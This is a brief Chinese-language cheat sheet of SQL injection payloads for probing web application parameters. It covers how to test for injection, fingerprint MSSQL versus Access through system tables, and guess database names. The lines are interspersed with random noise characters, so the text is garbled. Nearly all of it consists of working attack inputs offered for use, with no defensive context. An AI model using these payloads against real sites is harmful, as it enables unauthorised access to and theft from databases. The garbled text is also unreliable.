1.判断是否有注入;and 1=1 ;and 1=2 )E7 FA|
2.初步判断是否是mssql ;and user>0 ^DAa%u
iy5R5L2
3.注入参数是字符'and [查询条件] and ''=' s0LA^2U
:_dICxaLZT
4.搜索时没过滤参数的'and [查询条件] and '%25'=' @y~P&HUN
Z&yaSB
5.判断数据库系统 h!]"R<QQdu
T>]sQPg
;and (select count(*) from sysobjects)>0 mssql %EbiMo ]3B
+S {
;and (select count(*) from msysobjects)>0 access !)OB@F%U
K!8zwb=fq
+GNWF%
zN
'?/&n8J\
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Y\t_&